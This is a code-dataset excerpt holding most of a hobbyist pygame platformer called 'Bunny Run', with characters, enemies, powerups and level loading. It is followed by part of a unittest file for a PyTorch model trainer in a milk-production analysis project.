hit_list:\r\n if self.vy > 0:\r\n self.rect.bottom = block.rect.top\r\n self.vy = 0\r\n self.on_ground = True\r\n elif self.vy < 0:\r\n self.rect.top = block.rect.bottom\r\n self.vy = 0\r\n\r\n def process_coins(self, coins):\r\n hit_list = pygame.sprite.spritecollide(self, coins, True)\r\n\r\n for coin in hit_list:\r\n play_sound(COIN_SOUND)\r\n self.score += coin.value\r\n self.coins += 1\r\n if self.coins == 10:\r\n self.lives += 1\r\n self.coins = 0\r\n\r\n def process_enemies(self, enemies):\r\n hit_list = pygame.sprite.spritecollide(self, enemies, False)\r\n\r\n if len(hit_list) > 0 and self.invincibility == 0:\r\n play_sound(HURT_SOUND)\r\n self.hearts -= 1\r\n self.invincibility = int(0.75 * FPS)\r\n\r\n def process_powerups(self, powerups):\r\n hit_list = pygame.sprite.spritecollide(self, powerups, True)\r\n\r\n for p in hit_list:\r\n play_sound(POWERUP_SOUND)\r\n p.apply(self)\r\n\r\n def check_flag(self, level):\r\n hit_list = pygame.sprite.spritecollide(self, level.flag, False)\r\n\r\n if len(hit_list) > 0:\r\n level.completed = True\r\n play_sound(LEVELUP_SOUND)\r\n\r\n def set_image(self):\r\n if self.on_ground:\r\n if self.vx != 0:\r\n if self.facing_right:\r\n self.running_images = self.images_run_right\r\n else:\r\n self.running_images = self.images_run_left\r\n\r\n self.steps = (self.steps + 1) % self.speed # Works well with 2 images, try lower number if more frames are in animation\r\n\r\n if self.steps == 0:\r\n self.image_index = (self.image_index + 1) % len(self.running_images)\r\n self.image = self.running_images[self.image_index]\r\n else:\r\n self.image = self.image_idle\r\n else:\r\n if self.facing_right:\r\n self.image = self.image_jump_right\r\n else:\r\n self.image = self.image_jump_left\r\n\r\n def die(self):\r\n self.lives -= 1\r\n\r\n if self.lives > 0:\r\n play_sound(DIE_SOUND)\r\n else:\r\n play_sound(GAMEOVER_SOUND)\r\n\r\n def respawn(self, level):\r\n self.rect.x = level.start_x\r\n self.rect.y = level.start_y\r\n self.hearts = self.max_hearts\r\n self.invincibility = 0\r\n\r\n def calculate_jetpack_time(self):\r\n if self.jetpack_time <= 0:\r\n self.jetpack_on = False\r\n else:\r\n self.jetpack_time -= 1\r\n\r\n def update(self, level):\r\n self.process_enemies(level.enemies)\r\n if self.jetpack_on == True:\r\n pass\r\n else:\r\n self.apply_gravity(level)\r\n self.move_and_process_blocks(level.blocks)\r\n self.check_world_boundaries(level)\r\n self.set_image()\r\n\r\n if self.hearts > 0:\r\n self.process_coins(level.coins)\r\n self.process_powerups(level.powerups)\r\n self.check_flag(level)\r\n\r\n if self.invincibility > 0:\r\n self.invincibility -= 1\r\n else:\r\n self.die()\r\n\r\nclass Coin(Entity):\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\n self.value = 10\r\n\r\nclass Enemy(Entity):\r\n def __init__(self, x, y, images):\r\n super().__init__(x, y, images[0])\r\n\r\n self.images_right = images\r\n self.images_left = [pygame.transform.flip(img, 1, 0) for img in images]\r\n self.current_images = self.images_left\r\n self.image_index = 0\r\n self.steps = 0\r\n\r\n def reverse(self):\r\n self.vx *= -1\r\n\r\n if self.vx < 0:\r\n self.current_images = self.images_left\r\n else:\r\n self.current_images = self.images_right\r\n\r\n self.image = self.current_images[self.image_index]\r\n\r\n def check_world_boundaries(self, level):\r\n if self.rect.left < 0:\r\n self.rect.left = 0\r\n self.reverse()\r\n elif self.rect.right > level.width:\r\n self.rect.right = level.width\r\n self.reverse()\r\n\r\n def move_and_process_blocks(self):\r\n pass\r\n\r\n def set_images(self):\r\n if self.steps == 0:\r\n self.image = self.current_images[self.image_index]\r\n self.image_index = (self.image_index + 1) % len(self.current_images)\r\n\r\n self.steps = (self.steps + 1) % 20 # Nothing significant about 20. It just seems to work okay.\r\n\r\n def is_near(self, hero):\r\n return abs(self.rect.x - hero.rect.x) < 2 * WIDTH\r\n\r\n\r\n def reset(self):\r\n self.rect.x = self.start_x\r\n self.rect.y = self.start_y\r\n self.vx = self.start_vx\r\n self.vy = self.start_vy\r\n self.image = self.images_left[0]\r\n self.steps = 0\r\n\r\nclass Bear(Enemy):\r\n def __init__(self, x, y, images):\r\n super().__init__(x, y, images)\r\n\r\n self.start_x = x\r\n self.start_y = y\r\n self.start_vx = -2\r\n self.start_vy = 0\r\n\r\n self.vx = self.start_vx\r\n self.vy = self.start_vy\r\n\r\n def move_and_process_blocks(self, blocks):\r\n self.rect.x += self.vx\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vx > 0:\r\n self.rect.right = block.rect.left\r\n self.reverse()\r\n elif self.vx < 0:\r\n self.rect.left = block.rect.right\r\n self.reverse()\r\n\r\n self.rect.y += self.vy\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vy > 0:\r\n self.rect.bottom = block.rect.top\r\n self.vy = 0\r\n elif self.vy < 0:\r\n self.rect.top = block.rect.bottom\r\n self.vy = 0\r\n\r\n def update(self, level, hero):\r\n if self.is_near(hero):\r\n self.apply_gravity(level)\r\n self.move_and_process_blocks(level.blocks)\r\n self.check_world_boundaries(level)\r\n self.set_images()\r\n\r\nclass Monster(Enemy):\r\n def __init__(self, x, y, images):\r\n super().__init__(x, y, images)\r\n\r\n self.start_x = x\r\n self.start_y = y\r\n self.start_vx = -2\r\n self.start_vy = 0\r\n\r\n self.vx = self.start_vx\r\n self.vy = self.start_vy\r\n\r\n def move_and_process_blocks(self, blocks):\r\n reverse = False\r\n\r\n self.rect.x += self.vx\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vx > 0:\r\n self.rect.right = block.rect.left\r\n self.reverse()\r\n elif self.vx < 0:\r\n self.rect.left = block.rect.right\r\n self.reverse()\r\n\r\n self.rect.y += self.vy\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n reverse = True\r\n\r\n for block in hit_list:\r\n if self.vy >= 0:\r\n self.rect.bottom = block.rect.top\r\n self.vy = 0\r\n\r\n if self.vx > 0 and self.rect.right <= block.rect.right:\r\n reverse = False\r\n\r\n elif self.vx < 0 and self.rect.left >= block.rect.left:\r\n reverse = False\r\n\r\n elif self.vy < 0:\r\n self.rect.top = block.rect.bottom\r\n self.vy = 0\r\n\r\n if reverse:\r\n self.reverse()\r\n\r\n def update(self, level, hero):\r\n if self.is_near(hero):\r\n self.apply_gravity(level)\r\n self.move_and_process_blocks(level.blocks)\r\n self.check_world_boundaries(level)\r\n self.set_images()\r\n\r\nclass FlyMan(Enemy):\r\n \r\n def __init__(self, x, y, images):\r\n super().__init__(x, y, images)\r\n\r\n self.start_x = x\r\n self.start_y = y\r\n self.start_vx = -2\r\n self.start_vy = 0\r\n\r\n self.vx = self.start_vx\r\n self.vy = self.start_vy\r\n\r\n def move_and_process_blocks(self, blocks):\r\n self.rect.x += self.vx\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vx > 0:\r\n self.rect.right = block.rect.left\r\n self.reverse()\r\n elif self.vx < 0:\r\n self.rect.left = block.rect.right\r\n self.reverse()\r\n\r\n self.rect.y += self.vy\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vy > 0:\r\n self.rect.bottom = block.rect.top\r\n self.vy = 0\r\n elif self.vy < 0:\r\n self.rect.top = block.rect.bottom\r\n self.vy = 0\r\n\r\n def update(self, level, hero):\r\n if self.is_near(hero):\r\n self.move_and_process_blocks(level.blocks)\r\n self.check_world_boundaries(level)\r\n self.set_images()\r\n\r\nclass OneUp(Entity):\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\n def apply(self, character):\r\n character.lives += 1\r\n\r\nclass Heart(Entity):\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\n def apply(self, character):\r\n character.hearts += 1\r\n character.hearts = max(character.hearts, character.max_hearts)\r\n\r\nclass Powerup(Entity):\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\n def apply(self, character):\r\n character.score += 100\r\n\r\nclass Bolt(Entity):\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\n def apply(self, character):\r\n character.score -= 200\r\n if character.score < 0:\r\n character.score = 0\r\n\r\nclass Jetpack(Entity):\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n \r\n def apply(self, character):\r\n character.jetpack_on = True\r\n character.jetpack_time = 3 * FPS\r\n character.vy = 0\r\n character.vx = 15\r\n game.hero.rect.y = 64\r\n \r\nclass Bubble(Entity):\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\n def apply(self, character):\r\n character.invincibility = int(3 * FPS)\r\n\r\nclass Flag(Entity):\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\nclass Level():\r\n\r\n def __init__(self, file_path):\r\n self.starting_blocks = []\r\n self.starting_enemies = []\r\n self.starting_coins = []\r\n self.starting_powerups = []\r\n self.starting_flag = []\r\n\r\n self.blocks = pygame.sprite.Group()\r\n self.enemies = pygame.sprite.Group()\r\n self.coins = pygame.sprite.Group()\r\n self.powerups = pygame.sprite.Group()\r\n self.flag = pygame.sprite.Group()\r\n self.active_sprites = pygame.sprite.Group()\r\n self.inactive_sprites = pygame.sprite.Group()\r\n\r\n with open(file_path, 'r') as f:\r\n data = f.read()\r\n\r\n map_data = json.loads(data)\r\n\r\n self.width = map_data['width'] * GRID_SIZE\r\n self.height = map_data['height'] * GRID_SIZE\r\n self.time = map_data['time'] * FPS\r\n\r\n self.start_x = map_data['start'][0] * GRID_SIZE\r\n self.start_y = map_data['start'][1] * GRID_SIZE\r\n\r\n for item in map_data['blocks']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n img = block_images[item[2]]\r\n self.starting_blocks.append(Block(x, y, img))\r\n\r\n for item in map_data['bears']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_enemies.append(Bear(x, y, spikeman_images))\r\n\r\n for item in map_data['monsters']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_enemies.append(Monster(x, y, spikeball_images))\r\n\r\n for item in map_data['flyman']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_enemies.append(FlyMan(x, y, flyman_images))\r\n\r\n for item in map_data['coins']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_coins.append(Coin(x, y, coin_img))\r\n\r\n for item in map_data['oneups']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_powerups.append(OneUp(x, y, carrot_img))\r\n\r\n for item in map_data['hearts']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_powerups.append(Heart(x, y, powerup_img))\r\n\r\n for item in map_data['powerup']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_powerups.append(Powerup(x, y, gold_carrot_img))\r\n\r\n for item in map_data['bolt']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_powerups.append(Bolt(x, y, bolt_img))\r\n\r\n for item in map_data['jetpack']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_powerups.append(Jetpack(x, y, jetpack_img))\r\n\r\n for item in map_data['bubble']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_powerups.append(Bubble(x, y, bubble_img))\r\n\r\n for item in map_data['flag']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_flag.append(Flag(x, y, portal_img))\r\n\r\n self.background_layer = pygame.Surface([self.width, self.height], pygame.SRCALPHA, 32)\r\n self.scenery_layer = pygame.Surface([self.width, self.height], pygame.SRCALPHA, 32)\r\n self.inactive_layer = pygame.Surface([self.width, self.height], pygame.SRCALPHA, 32)\r\n self.active_layer = pygame.Surface([self.width, self.height], pygame.SRCALPHA, 32)\r\n\r\n if map_data['background-color'] != \"\":\r\n self.background_layer.fill(map_data['background-color'])\r\n\r\n if map_data['background-img'] != \"\":\r\n background_img = pygame.image.load(map_data['background-img'])\r\n\r\n if map_data['background-fill-y']:\r\n h = background_img.get_height()\r\n w = int(background_img.get_width() * HEIGHT / h)\r\n background_img = pygame.transform.scale(background_img, (w, HEIGHT))\r\n\r\n if \"top\" in map_data['background-position']:\r\n start_y = 0\r\n elif \"bottom\" in map_data['background-position']:\r\n start_y = self.height - background_img.get_height()\r\n\r\n if map_data['background-repeat-x']:\r\n for x in range(0, self.width, background_img.get_width()):\r\n self.background_layer.blit(background_img, [x, start_y])\r\n else:\r\n self.background_layer.blit(background_img, [0, start_y])\r\n\r\n if map_data['scenery-img'] != \"\":\r\n scenery_img = pygame.image.load(map_data['scenery-img'])\r\n\r\n if map_data['scenery-fill-y']:\r\n h = scenery_img.get_height()\r\n w = int(scenery_img.get_width() * HEIGHT / h)\r\n scenery_img = pygame.transform.scale(scenery_img, (w, HEIGHT))\r\n\r\n if \"top\" in map_data['scenery-position']:\r\n start_y = 0\r\n elif \"bottom\" in map_data['scenery-position']:\r\n start_y = self.height - scenery_img.get_height()\r\n\r\n if map_data['scenery-repeat-x']:\r\n for x in range(0, self.width, scenery_img.get_width()):\r\n self.scenery_layer.blit(scenery_img, [x, start_y])\r\n else:\r\n self.scenery_layer.blit(scenery_img, [0, start_y])\r\n\r\n pygame.mixer.music.load(map_data['music'])\r\n\r\n self.gravity = map_data['gravity']\r\n self.terminal_velocity = map_data['terminal-velocity']\r\n\r\n self.completed = False\r\n\r\n self.blocks.add(self.starting_blocks)\r\n self.enemies.add(self.starting_enemies)\r\n self.coins.add(self.starting_coins)\r\n self.powerups.add(self.starting_powerups)\r\n self.flag.add(self.starting_flag)\r\n\r\n self.active_sprites.add(self.coins, self.enemies, self.powerups)\r\n self.inactive_sprites.add(self.blocks, self.flag)\r\n\r\n self.inactive_sprites.draw(self.inactive_layer)\r\n\r\n def calculate_time(self):\r\n self.time -= 1\r\n if self.time <= 0:\r\n self.time = 0\r\n\r\n def reset(self):\r\n self.enemies.add(self.starting_enemies)\r\n self.coins.add(self.starting_coins)\r\n self.powerups.add(self.starting_powerups)\r\n\r\n self.active_sprites.add(self.coins, self.enemies, self.powerups)\r\n\r\n for e in self.enemies:\r\n e.reset()\r\n\r\nclass Game():\r\n\r\n SPLASH = 0\r\n START = 1\r\n PLAYING = 2\r\n PAUSED = 3\r\n LEVEL_COMPLETED = 4\r\n GAME_OVER = 5\r\n VICTORY = 6\r\n\r\n def __init__(self):\r\n self.window = pygame.display.set_mode([WIDTH, HEIGHT])\r\n pygame.display.set_caption(TITLE)\r\n self.clock = pygame.time.Clock()\r\n self.done = False\r\n\r\n self.reset()\r\n\r\n def start(self):\r\n self.level = Level(levels[self.current_level])\r\n self.level.reset()\r\n self.hero.respawn(self.level)\r\n\r\n def advance(self):\r\n self.current_level += 1\r\n self.start()\r\n self.stage = Game.START\r\n self.hero.score += (self.level.time * 5)\r\n\r\n def reset(self):\r\n self.hero = Character(bunny_images)\r\n self.current_level = 0\r\n self.start()\r\n self.stage = Game.SPLASH\r\n\r\n def display_splash(self, surface):\r\n line1 = Chocolate_Bar_Font.render(TITLE, 1, DARK_BLUE)\r\n line2 = Chocolate_Bar_Font.render(\"Are you up to the challenge?\", 1, WHITE)\r\n line3 = Chocolate_Bar_Font.render(\"PRESS ANY KEY TO START\", 1, WHITE)\r\n\r\n x1 = WIDTH / 2 - line1.get_width() / 2;\r\n y1 = HEIGHT / 3 - line1.get_height() / 2;\r\n\r\n x2 = WIDTH / 2 - line2.get_width() / 2;\r\n y2 = y1 + line1.get_height() + 16;\r\n\r\n x3 = WIDTH / 2 - line3.get_width() / 2;\r\n y3 = HEIGHT - line3.get_height() - 64;\r\n\r\n bun_x1 = 64\r\n bun_y1 = 64\r\n bun_x2 = WIDTH - 128\r\n bun_y2 = HEIGHT - 128\r\n\r\n pygame.draw.rect(surface, PURPLE, [0, 0, WIDTH, HEIGHT])\r\n surface.blit(line1, (x1, y1))\r\n surface.blit(line2, (x2, y2))\r\n surface.blit(line3, (x3, y3))\r\n surface.blit(bunny_idle, (bun_x1, bun_y1))\r\n surface.blit(bunny_idle, (bun_x1, bun_y2))\r\n surface.blit(bunny_idle, (bun_x2, bun_y1))\r\n surface.blit(bunny_idle, (bun_x2, bun_y2))\r\n\r\n def display_message(self, surface, primary_text, secondary_text):\r\n line1 = Chocolate_Bar_Font.render(primary_text, 1, WHITE)\r\n line2 = Chocolate_Bar_Font.render(secondary_text, 1, WHITE)\r\n\r\n x1 = WIDTH / 2 - line1.get_width() / 2;\r\n y1 = HEIGHT / 3 - line1.get_height() / 2;\r\n\r\n x2 = WIDTH / 2 - line2.get_width() / 2;\r\n y2 = y1 + line1.get_height() + 16;\r\n\r\n box_x = WIDTH / 2 - line2.get_width() / 2;\r\n box_y = HEIGHT / 3 - line1.get_height() / 2;\r\n box_w = line2.get_width()\r\n box_h = line1.get_height() + line2.get_height() + 16;\r\n\r\n pygame.draw.rect(surface, PURPLE, [box_x, box_y, box_w, box_h])\r\n surface.blit(line1, (x1, y1))\r\n surface.blit(line2, (x2, y2))\r\n\r\n def display_stats(self, surface):\r\n hearts_text = Bubblegum_Font.render(\"Hearts: \" + str(self.hero.hearts)+ \"/\" + str(self.hero.max_hearts), 1, WHITE)\r\n lives_text = Bubblegum_Font.render(\"x \" + str(self.hero.lives), 1, WHITE)\r\n score_text = Bubblegum_Font.render(\"Score: \" + str(self.hero.score), 1, WHITE)\r\n level_text = Bubblegum_Font.render(\"Level: \" + str(self.current_level + 1), 1, WHITE)\r\n coins_text = Bubblegum_Font.render(\"Coins: \" + str(self.hero.coins), 1, WHITE)\r\n time_text = Bubblegum_Font.render(\"Time Remaining: \" + str(self.level.time//60), 1, WHITE)\r\n\r\n surface.blit(score_text, (WIDTH - score_text.get_width() - 32, 32))\r\n surface.blit(hearts_text, (32, 32))\r\n surface.blit(bunny_idle, (32, 64))\r\n surface.blit(lives_text, (128, 80))\r\n surface.blit(level_text, (32, 128))\r\n surface.blit(coins_text, (32, 160))\r\n surface.blit(time_text, (32, 192))\r\n if self.hero.jetpack_on == True:\r\n jetpack_text = Bubblegum_Font.render(\"Jetpack Time: \" + str(self.hero.jetpack_time//60), 1, WHITE)\r\n surface.blit(jetpack_text, (32, 224))\r\n else:\r\n pass\r\n \r\n def display_credits(self, surface):\r\n line1 = Chocolate_Bar_Font.render(\"CONGRATULATIONS!\", 1, WHITE)\r\n line2 = Chocolate_Bar_Font.render(\"You are the ultImate bunny runner\", 1, WHITE)\r\n line3 = Chocolate_Bar_Font.render(\"Score: \" + str(self.hero.score), 1, WHITE)\r\n line4 = Chocolate_Bar_Font.render(\"Press R to Run AgaIn\", 1, WHITE)\r\n line5 = Bubblegum_Font.render(\"Bunny Run created by: Casey Groves\", 1, WHITE)\r\n\r\n x1 = WIDTH / 2 - line1.get_width() / 2;\r\n y1 = HEIGHT / 5;\r\n\r\n x2 = WIDTH / 2 - line2.get_width() / 2;\r\n y2 = y1 + line2.get_height() + 16;\r\n\r\n x3 = WIDTH / 2 - line3.get_width() / 2;\r\n y3 = y2 + line3.get_height() + 16;\r\n\r\n x4 = WIDTH / 2 - line4.get_width() / 2;\r\n y4 = y3 + line4.get_height() + 16;\r\n\r\n x5 = WIDTH / 2 - line5.get_width() / 2;\r\n y5 = y4 + line5.get_height() + 64;\r\n\r\n pygame.draw.rect(surface, PURPLE, [0, 0, WIDTH, HEIGHT])\r\n surface.blit(line1, (x1, y1))\r\n surface.blit(line2, (x2, y2))\r\n surface.blit(line3, (x3, y3))\r\n surface.blit(line4, (x4, y4))\r\n surface.blit(line5, (x5, y5))\r\n\r\n def process_events(self):\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.done = True\r\n\r\n elif event.type == pygame.KEYDOWN:\r\n if self.stage == Game.SPLASH or self.stage == Game.START:\r\n self.stage = Game.PLAYING\r\n play_music()\r\n\r\n elif self.stage == Game.PLAYING:\r\n if event.key == JUMP:\r\n self.hero.jump(self.level.blocks)\r\n if event.key == pygame.K_f:\r\n self.hero.speed = 10\r\n elif event.key != pygame.K_f:\r\n self.hero.speed = 5\r\n\r\n elif self.stage == Game.PAUSED:\r\n pass\r\n\r\n elif self.stage == Game.LEVEL_COMPLETED:\r\n self.advance()\r\n\r\n elif self.stage == Game.VICTORY or self.stage == Game.GAME_OVER:\r\n if event.key == pygame.K_r:\r\n self.reset()\r\n\r\n pressed = pygame.key.get_pressed()\r\n\r\n if self.stage == Game.PLAYING:\r\n if self.hero.jetpack_on == False:\r\n if pressed[LEFT]:\r\n self.hero.move_left()\r\n elif pressed[RIGHT]:\r\n self.hero.move_right()\r\n else:\r\n self.hero.stop()\r\n else:\r\n pass\r\n\r\n def update(self):\r\n if self.stage == Game.PLAYING:\r\n self.hero.update(self.level)\r\n self.level.enemies.update(self.level, self.hero)\r\n self.level.calculate_time()\r\n if self.hero.jetpack_on == True:\r\n self.hero.calculate_jetpack_time()\r\n else:\r\n pass\r\n\r\n if self.level.completed:\r\n if self.current_level < len(levels) - 1:\r\n self.stage = Game.LEVEL_COMPLETED\r\n else:\r\n self.stage = Game.VICTORY\r\n pygame.mixer.music.stop()\r\n\r\n elif self.hero.lives == 0 or self.level.time == 0:\r\n self.stage = Game.GAME_OVER\r\n pygame.mixer.music.stop()\r\n\r\n elif self.hero.hearts == 0:\r\n self.level.reset()\r\n self.hero.respawn(self.level)\r\n\r\n def calculate_offset(self):\r\n x = -1 * self.hero.rect.centerx + WIDTH / 2\r\n\r\n if self.hero.rect.centerx < WIDTH / 2:\r\n x = 0\r\n elif self.hero.rect.centerx > self.level.width - WIDTH / 2:\r\n x = -1 * self.level.width + WIDTH\r\n\r\n return x, 0\r\n\r\n def draw(self):\r\n offset_x, offset_y = self.calculate_offset()\r\n\r\n self.level.active_layer.fill(TRANSPARENT)\r\n self.level.active_sprites.draw(self.level.active_layer)\r\n\r\n if self.hero.invincibility % 3 < 2:\r\n self.level.active_layer.blit(self.hero.image, [self.hero.rect.x, self.hero.rect.y])\r\n\r\n self.window.blit(self.level.background_layer, [offset_x / 3, offset_y])\r\n self.window.blit(self.level.scenery_layer, [offset_x / 2, offset_y])\r\n self.window.blit(self.level.inactive_layer, [offset_x, offset_y])\r\n self.window.blit(self.level.active_layer, [offset_x, offset_y])\r\n\r\n self.display_stats(self.window)\r\n\r\n if self.stage == Game.SPLASH:\r\n self.display_splash(self.window)\r\n elif self.stage == Game.START:\r\n self.display_message(self.window, \"Ready?!!!\", \"Press any key to start\")\r\n elif self.stage == Game.PAUSED:\r\n pass\r\n elif self.stage == Game.LEVEL_COMPLETED:\r\n self.display_message(self.window, \"Level Complete\", \"Press any key to continue\")\r\n elif self.stage == Game.VICTORY:\r\n self.display_credits(self.window)\r\n elif self.stage == Game.GAME_OVER:\r\n self.display_message(self.window, \"Game Over\", \"Press 'R' to restart\")\r\n\r\n pygame.display.flip()\r\n\r\n def loop(self):\r\n while not self.done:\r\n self.process_events()\r\n self.update()\r\n self.draw()\r\n self.clock.tick(FPS)\r\n\r\nif __name__ == \"__main__\":\r\n game = Game()\r\n game.start()\r\n game.loop()\r\n pygame.quit()\r\n sys.exit()\r\n","sub_path":"Casey's Bunny Run.py","file_name":"Casey's Bunny Run.py","file_ext":"py","file_size_in_byte":33881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"370953604","text":"import os\nimport sqlite3\nimport unittest\nfrom collections import Counter\n\nimport peewee as pw\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\n\nimport milk_production_analysis.db.training as training\nimport milk_production_analysis.model.datasets as datasets\nimport milk_production_analysis.model.nets as nets\nimport milk_production_analysis.model.trainer as trainer\n\nfrom . import test_nets\nfrom .. import test_settings\n\ntraining.initialize_db(db_path=test_settings.TRAINING_DB_PATH)\n\n\nclass ModelTrainerTests(unittest.TestCase):\n\n def setUp(self):\n x = torch.rand(1000, 10)\n y = torch.randint(0, 1, (1000, 1))\n self.batch_size = 100\n self.dataset = data.TensorDataset(x, y)\n self.model = nets.BaseSupervisedModel(\n optimizer=optim.SGD,\n optimizer_params={'lr': 1e-2},\n model=nn.Linear(x.size()[-1], y.size()[-1]),\n objective_loss=nn.MSELoss())\n self.trainer = trainer.BaseModelTrainer(batch_size=self.batch_size, num_workers=2, db_path=test_settings.TRAINING_DB_PATH)\n\n def tearDown(self):\n del self.trainer, self.model\n\n def test_A01_data_splits(self):\n test, train_full = self.trainer.split_test_train(dataset=self.dataset, test_split_ratio=0.2)\n self.assertEqual(len(train_full), int(len(self.dataset)*(1-0.2)))\n self.assertEqual(len(test), len(self.dataset)-len(train_full))\n\n train, validate = self.trainer.split_train_validate(dataset=train_full, train_split_ratio=0.8)\n self.assertEqual(len(train), 1)\n self.assertEqual(len(train[0]), 1)\n self.assertEqual(len(train[0][0]), int(len(train_full)*0.8))\n self.assertEqual(len(validate), 1)\n self.assertEqual(len(validate[0]), len(train_full)-len(train[0][0]))\n\n train, validate = self.trainer.split_cross_validation(dataset=train_full, cv_folds=3)\n self.assertEqual(len(train), 3)\n self.assertEqual(len(train[0]), 3-1)\n self.assertEqual(len(train[0][0]), int(len(train_full)/3))\n self.assertEqual(len(validate), 3)\n self.assertEqual(len(validate[0]), int(len(train_full)/3))\n\n def test_A02_multithreaded_data_loading(self):\n test, train_full = self.trainer.split_test_train(dataset=self.dataset, test_split_ratio=0.2)\n train, validate = self.trainer.split_train_validate(dataset=train_full, train_split_ratio=0.8)\n\n self.assertGreater(len(test), self.batch_size)\n self.assertGreater(len(train[0][0]), self.batch_size)\n self.assertGreater(len(validate[0]), self.batch_size)\n\n batches = self.trainer.create_dataloader(self.dataset)\n self.assertEqual(len(batches), int(len(self.dataset)/self.batch_size))\n del batches\n\n test_batches = self.trainer.create_dataloader(test)\n self.assertEqual(len(test_batches), int((len(self.dataset)-len(train_full))/self.batch_size))\n train_batches = self.trainer.create_dataloader(train[0][0])\n self.assertEqual(len(train_batches), int((len(train_full)*0.8)/self.batch_size))\n validate_batches = self.trainer.create_dataloader(validate[0])\n self.assertEqual(len(validate_batches), int((len(train_full)-len(train[0][0]))/self.batch_size))\n for batches in [train_batches, validate_batches, test_batches]:\n for _ in batches:\n pass\n del batches\n\n def test_A03_single_epoch_trainvalidatesplit_training(self):\n train, validate = self.trainer.split_train_validate(dataset=self.dataset, train_split_ratio=0.8)\n print(len(train), len(train[0]), len(train[0][0]))\n print(len(validate), len(validate[0]))\n train_batches = self.trainer.create_dataloader(train[0][0])\n print(len(train_batches))\n validate_batches = self.trainer.create_dataloader(validate[0])\n print(len(validate_batches))\n self.model.process_batches(batches=train_batches, phase='train')\n self.model.process_batches(batches=validate_batches, phase='validate')\n del train_batches, validate_batches\n\n def test_A04_single_epoch_kfold_cross_validation_training(self):\n train, validate = self.trainer.split_cross_validation(dataset=self.dataset, cv_folds=3)\n for batch in train[0]:\n self.model.process_batches(batches=self.trainer.create_dataloader(batch), phase='train')\n self.model.process_batches(batches=self.trainer.create_dataloader(validate[0]), phase='validate')\n\n def test_A05_single_epoch_processing_the_test_set(self):\n test, _ = self.trainer.split_test_train(dataset=self.dataset, test_split_ratio=0.3)\n self.model.process_batches(batches=self.trainer.create_dataloader(test), phase='test')\n\n def test_A06_multiepoch_traintestsplit_training(self):\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=False)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_A07_multiepoch_kfold_cross_validation_training(self):\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n use_cv=True,\n cv_folds=3,\n use_early_stopping=False)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_A08_multiepoch_early_stopping_training(self):\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=True,\n patience=1)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_A09_multimodel_training(self):\n db_size_pre = len(training.TrainedModel)\n with self.assertRaises(pw.IntegrityError):\n self.trainer.train(\n dataset=self.dataset,\n models=[self.model, self.model],\n epochs=2,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=True,\n patience=1)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_A10_random_patience_initializations(self):\n self.assertEqual(len(self.trainer.initialize_random_patiences([])), 0)\n self.assertEqual(len(self.trainer.initialize_random_patiences([True, True])), 2)\n\n\nclass MilkYieldModelTrainerTests():\n\n def test_B01_optimizing_with_rmsprop(self):\n self.model = nets.MilkYieldLSTM(optimizer=optim.RMSprop, debug=True)\n test_nets.rename_model(self.model)\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=False)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_B02_gru(self):\n self.model = nets.MilkYieldGRU(optimizer=optim.RMSprop, debug=True)\n test_nets.rename_model(self.model)\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n 